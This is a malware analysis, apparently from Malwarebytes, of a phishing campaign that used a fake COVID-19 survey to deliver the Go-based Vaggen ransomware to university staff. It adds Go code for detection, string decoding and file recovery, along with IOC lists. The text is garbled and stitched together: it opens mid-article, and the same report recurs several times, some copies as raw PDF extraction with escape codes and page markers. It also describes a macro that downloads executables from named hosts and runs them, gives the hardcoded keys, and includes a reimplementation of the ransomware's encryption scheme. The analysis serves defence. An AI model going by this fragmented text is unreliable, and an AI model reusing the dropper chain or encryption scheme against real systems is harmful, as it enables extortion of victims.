Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted for a particular event: a canary token is a URL, document or credential planted by defenders that reports back when touched, which makes it a useful early warning that an intruder has had access to a network. In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from; because the macro hits one of two distinct URLs depending on the Shell return value, the callbacks also tell the operator whether the payload actually launched.
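As an added example (not code from the original post or from the malware), the macro's observable behaviour above can be turned into detection logic. The Go program below runs three rules over a handful of constructed Sysmon-style JSON events (assumed field names, with EventID 1 for process creation, 11 for file creation and 22 for DNS queries): an Office process writing an .exe under AppData\Roaming, an Office process spawning an executable from there, and an Office process resolving one of the staging or beacon domains named in the analysis. The sample lines, the "alice" profile and the Byxor path they contain are constructed for the demonstration.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// Event is a cut-down Sysmon-style record. Field names are assumed; the log lines
// below are constructed for this demonstration and are not logs from the incident.
type Event struct {
	ID          int    `json:"EventID"` // 1 process create, 11 file create, 22 DNS query
	Image       string `json:"Image"`
	ParentImage string `json:"ParentImage,omitempty"`
	Target      string `json:"TargetFilename,omitempty"`
	Query       string `json:"QueryName,omitempty"`
}

// sampleLog is newline-delimited JSON; backslashes are doubled because JSON requires it.
var sampleLog = `
{"EventID":11,"Image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","TargetFilename":"C:\\Users\\alice\\AppData\\Roaming\\Byxor\\Killar.exe"}
{"EventID":1,"ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","Image":"C:\\Users\\alice\\AppData\\Roaming\\Byxor\\Killar.exe"}
{"EventID":22,"Image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","QueryName":"canarytokens.com"}
{"EventID":22,"Image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","QueryName":"notabug.org"}
{"EventID":11,"Image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","TargetFilename":"C:\\Users\\alice\\Documents\\survey.docx"}
{"EventID":1,"ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\notepad.exe"}
`

var officeApps = map[string]bool{"winword.exe": true, "excel.exe": true, "powerpnt.exe": true}

// beaconDomains are the hosting and callback domains from the macro analysis above.
var beaconDomains = []string{"canarytokens.com", "notabug.org"}

type Alert struct{ Rule, Evidence string }

// baseName handles Windows paths on any host; filepath.Base would not split on '\'.
func baseName(p string) string { return strings.ToLower(p[strings.LastIndexAny(p, `\/`)+1:]) }

func underRoaming(p string) bool { return strings.Contains(strings.ToLower(p), `\appdata\roaming\`) }

func fromOffice(image string) bool { return officeApps[baseName(image)] }

// Detect applies the three behaviours of the macro chain to newline-delimited JSON events
// and returns one alert per matching event, in log order.
func Detect(log string) []Alert {
	var alerts []Alert
	for _, line := range strings.Split(strings.TrimSpace(log), "\n") {
		var ev Event
		if err := json.Unmarshal([]byte(line), &ev); err != nil {
			continue // unparsable line; a production pipeline should count these, not drop them silently
		}
		switch {
		case ev.ID == 11 && fromOffice(ev.Image) && underRoaming(ev.Target) && strings.HasSuffix(strings.ToLower(ev.Target), ".exe"):
			alerts = append(alerts, Alert{"office-drops-exe-in-roaming", ev.Target})
		case ev.ID == 1 && fromOffice(ev.ParentImage) && underRoaming(ev.Image):
			alerts = append(alerts, Alert{"office-spawns-dropped-exe", ev.Image})
		case ev.ID == 22 && fromOffice(ev.Image):
			for _, d := range beaconDomains {
				if q := strings.ToLower(ev.Query); q == d || strings.HasSuffix(q, "."+d) {
					alerts = append(alerts, Alert{"office-resolves-staging-or-beacon-domain", ev.Query})
				}
			}
		}
	}
	return alerts
}

func main() {
	for _, a := range Detect(sampleLog) {
		fmt.Printf("%-42s %s\n", a.Rule, a.Evidence)
	}
}
```

The first two rules are deliberately not tied to the Byxor name or to killar.exe: an Office process writing and then launching an executable under the roaming profile is the generic shape of a macro dropper, so the same logic fires on the other four variants and on the coin-miner templates mentioned later. The domain rule is the brittle one, since the attacker can move to another code host or a different beacon service at any time.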
Vaggen ransomware
After being deployed, the ransomware starts encrypting the user's files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.
The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as 'main_main'.
Other functions belonging to the main application have obfuscated names (several of them Swedish words), such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA. Three of them map to their actual roles as follows:
main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen
A full list of the functions, along with their RVAs, can be found here.
Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA, using the xxtea-go library. Encrypted chunks are first decoded from Base64 and then decrypted with the hardcoded XXTEA key "STALKER". At the end of the execution, the decrypted ransom note is dropped on the Desktop.
Encrypting and renaming of the files is implemented as the callback passed to the standard Go library function filepath.Walk (package path/filepath), which visits every file under the starting directory.
Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption routine is similar to the one demonstrated here.
It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom; the file content is encrypted with the gcm.Seal function.
The output file (with the .VAGGEN extension) contains, in order:
the 12-byte nonce
the encrypted content
the 16-byte GCM tag
This is exactly the layout Go's gcm.Seal produces when the nonce slice is passed as its destination: Seal appends the ciphertext and then the authentication tag to it.
The hardcoded key "du_tar_mitt_hjart_mina_pengarna0" found inside the malware code is Swedish for "you take my heart my money". Using this key, we can easily decrypt the content.
With all these elements, we can actually recover encrypted files without having to pay the ransom: the key is the same for every victim and sits in the binary, and the nonce is stored in the clear at the start of each encrypted file, so nothing has to be obtained from the attacker. It appears that the malware author has not received any payment so far at this Bitcoin address.
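The string protection described above (Base64, then XXTEA under the hardcoded key "STALKER"), as an added example that is not code from the original post or from the malware. The block below is a stand-alone Go implementation of XXTEA together with a decoder that reverses the two steps; because no ciphertext from the sample is reproduced on this page, it also carries the forward direction so that it can build and then decode a constructed blob. The word-packing conventions (little-endian 32-bit words, a trailing length word, key zero-padded to 16 bytes) are those of the xxtea-go library as assumed here, and should be checked against the library before the decoder is pointed at strings pulled from the real binary.

```go
package main

import (
	"encoding/base64"
	"encoding/binary"
	"fmt"
)
// xxteaKey is the key named in the analysis above. The packing rules used below (little-endian
// words, trailing length word, key zero-padded to 16 bytes) are assumed xxtea-go conventions.
const (
	xxteaKey = "STALKER"
	delta    = 0x9e3779b9
)

// mx is the XXTEA round function (Wheeler/Needham, "Corrected Block TEA").
func mx(sum, y, z, p, e uint32, k []uint32) uint32 {
	return ((z>>5 ^ y<<2) + (y>>3 ^ z<<4)) ^ ((sum ^ y) + (k[(p&3)^e] ^ z))
}

// xxtea transforms v in place under the 4-word key k; encrypt=false runs the inverse.
func xxtea(v, k []uint32, encrypt bool) {
	n := uint32(len(v))
	if n < 2 {
		return // the reference algorithm leaves a single word untouched
	}
	rounds := 6 + 52/n
	if encrypt {
		z, sum := v[n-1], uint32(0)
		for ; rounds > 0; rounds-- {
			sum += delta
			e := (sum >> 2) & 3
			var p uint32
			for p = 0; p < n-1; p++ {
				v[p] += mx(sum, v[p+1], z, p, e, k)
				z = v[p]
			}
			v[n-1] += mx(sum, v[0], z, p, e, k)
			z = v[n-1]
		}
		return
	}
	y, sum := v[0], rounds*delta
	for ; rounds > 0; rounds-- {
		e := (sum >> 2) & 3
		for p := n - 1; p > 0; p-- {
			v[p] -= mx(sum, y, v[p-1], p, e, k)
			y = v[p]
		}
		v[0] -= mx(sum, y, v[n-1], 0, e, k)
		y = v[0]
		sum -= delta
	}
}

// toWords packs bytes into little-endian 32-bit words, zero-padding the last one.
func toWords(b []byte) []uint32 {
	v := make([]uint32, (len(b)+3)/4)
	for i, c := range b {
		v[i/4] |= uint32(c) << (8 * uint(i%4))
	}
	return v
}

func fromWords(v []uint32) []byte {
	out := make([]byte, 4*len(v))
	for i, w := range v {
		binary.LittleEndian.PutUint32(out[4*i:], w)
	}
	return out
}

// keyWords zero-pads a short key to 16 bytes (four words), as the library does.
func keyWords(key string) []uint32 {
	return toWords(append([]byte(key), make([]byte, 16)...)[:16])
}

// DecodeString reverses the string protection: Base64, then XXTEA under key. The trailing
// length word is validated first; it is what breaks on a wrong key or a damaged blob.
func DecodeString(b64, key string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	v := toWords(raw)
	xxtea(v, keyWords(key), false)
	if limit := uint32(4*len(v) - 4); len(v) == 0 || v[len(v)-1] > limit || v[len(v)-1]+3 < limit {
		return "", fmt.Errorf("xxtea: bad length word (wrong key or corrupt data)")
	}
	return string(fromWords(v)[:int(v[len(v)-1])]), nil
}

// EncodeString is the forward direction, used here only to build a constructed sample.
func EncodeString(s, key string) string {
	v := append(toWords([]byte(s)), uint32(len(s)))
	xxtea(v, keyWords(key), true)
	return base64.StdEncoding.EncodeToString(fromWords(v))
}

func main() {
	fmt.Println(DecodeString(EncodeString("constructed note text, not the real ransom note", xxteaKey), xxteaKey))
}
```

The length-word check is the useful part when working through the binary's string table: a wrong key or a mis-cut Base64 chunk almost never decrypts to a trailing word that matches the buffer size, so bad guesses fail loudly instead of producing plausible-looking garbage.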
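The .VAGGEN file layout and the hardcoded AES-256 key described above, as an added example in Go that is not code from the original post or from the malware. SealFile mirrors the scheme only so that a sample file can be constructed here (crypto/rand stands in for CryptGenRandom); OpenFile is the recovery step, parsing nonce || ciphertext || tag and decrypting under the fixed key. The plaintext used in main is constructed.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
)

// vaggenKey is the 32-byte key quoted in the analysis above; its length selects AES-256.
const (
	vaggenKey = "du_tar_mitt_hjart_mina_pengarna0"
	nonceLen  = 12
)

func vaggenGCM() (cipher.AEAD, error) {
	block, err := aes.NewCipher([]byte(vaggenKey))
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block) // standard GCM: 12-byte nonce, 16-byte tag
}

// SealFile reproduces the layout described above: nonce || ciphertext || tag.
// crypto/rand stands in for CryptGenRandom; gcm.Seal appends ciphertext and tag to dst.
func SealFile(plain []byte) ([]byte, error) {
	gcm, err := vaggenGCM()
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceLen)
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plain, nil), nil
}

// OpenFile parses a .VAGGEN blob and recovers the original bytes. Because GCM is
// authenticated, a truncated or tampered file is rejected instead of decrypted to garbage.
func OpenFile(blob []byte) ([]byte, error) {
	gcm, err := vaggenGCM()
	if err != nil {
		return nil, err
	}
	if len(blob) < nonceLen+gcm.Overhead() {
		return nil, errors.New("vaggen: file too short to hold a nonce and a tag")
	}
	return gcm.Open(nil, blob[:nonceLen], blob[nonceLen:], nil)
}

func main() {
	blob, err := SealFile([]byte("constructed document body, not a victim file"))
	if err != nil {
		panic(err)
	}
	plain, err := OpenFile(blob)
	fmt.Printf("%d-byte .VAGGEN blob -> %q (err=%v)\n", len(blob), plain, err)
}
```

A recovery tool wraps OpenFile in the same kind of filepath.Walk the malware uses and strips the .VAGGEN suffix from each file it restores. The authentication failure path matters in practice: a file that was truncated, or whose encryption was interrupted, returns an error here rather than a silently corrupted document, and that is worth reporting to the user rather than swallowing.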
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1095 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1096 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group.
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims into paying to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality of these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from file sharing services without creating a number of false positives.

The attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more.
Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro.
That file was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the Shell function to execute killar.exe
Checks the return value of the Shell function to determine whether it succeeded (the return value is the task ID of the launched application)
If successful, it sends a GET HTTP request to: canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If it isn’t successful, it sends a GET HTTP request to: canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to be alerted when a particular event occurs.

This can be very useful as an early warning notification system that an intruder has gained access to a network.
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files, adding the .VAGGEN extension to each of them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD, to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go; its entry point is the function denoted as ‘main_main’.

Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA. Three of them map to recognizable roles:

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (such as the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64; the XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming the files is implemented as the callback of the standard Go library function filepath.Walk (package path/filepath).

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption algorithm is similar to the one demonstrated here.
It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom. The file content is encrypted with the gcm.Seal function.

The content of the output file (with .VAGGEN extension) consists of:

the 12-byte nonce
the encrypted content
the 16-byte GCM tag

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.

Crawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1135 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1136 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1137 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1138 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1139 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1140 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1141 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1142 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1143 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1144 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1145 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1146 of 
